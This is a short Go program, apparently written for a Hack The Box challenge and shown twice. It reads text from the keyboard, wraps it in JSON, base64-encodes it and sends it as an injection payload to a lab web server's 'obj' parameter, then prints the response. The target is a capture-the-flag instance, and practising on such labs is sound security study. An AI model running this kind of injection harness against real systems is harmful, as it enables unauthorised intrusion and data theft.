daehee/main.go

## main.go
package main

import (
    "bufio"
    "encoding/base64"
    "encoding/json"
    "fmt"
    "log"
    "net/http"
    "os"
    "strings"

    "github.com/PuerkitoBio/goquery"
)

func checkErr(err error) {
    if err != nil {
        log.Fatalln(err)
    }
}

func main() {

    for {
        reader := bufio.NewReader(os.Stdin)
        fmt.Print("Enter text:")
        injectStr, _ := reader.ReadString('\n')

        injectJSON, _ := json.Marshal(map[string]string{"ID": strings.TrimSpace(injectStr)})
        payload := base64.URLEncoding.EncodeToString(injectJSON)
        fmt.Println("Payload: " + payload)

        targetURL := `http://docker.hackthebox.eu:31763/index.php?obj=` + payload

        res, err := http.Get(targetURL)
        checkErr(err)
        defer res.Body.Close()

        doc, err := goquery.NewDocumentFromReader(res.Body)
        checkErr(err)

        doc.Find("body").Each(func(i int, s *goquery.Selection) {
            fmt.Println(strings.TrimSpace(s.Text()))
        })
    }
}
	package main

	import (
	"bufio"
	"encoding/base64"
	"encoding/json"
	"fmt"
	"log"
	"net/http"
	"os"
	"strings"

	"github.com/PuerkitoBio/goquery"
	)

	func checkErr(err error) {
	if err != nil {
	log.Fatalln(err)
	}
	}

	func main() {

	for {
	reader := bufio.NewReader(os.Stdin)
	fmt.Print("Enter text:")
	injectStr, _ := reader.ReadString('\n')

	injectJSON, _ := json.Marshal(map[string]string{"ID": strings.TrimSpace(injectStr)})
	payload := base64.URLEncoding.EncodeToString(injectJSON)
	fmt.Println("Payload: " + payload)

	targetURL := `http://docker.hackthebox.eu:31763/index.php?obj=` + payload

	res, err := http.Get(targetURL)
	checkErr(err)
	defer res.Body.Close()

	doc, err := goquery.NewDocumentFromReader(res.Body)
	checkErr(err)

	doc.Find("body").Each(func(i int, s *goquery.Selection) {
	fmt.Println(strings.TrimSpace(s.Text()))
	})
	}
	}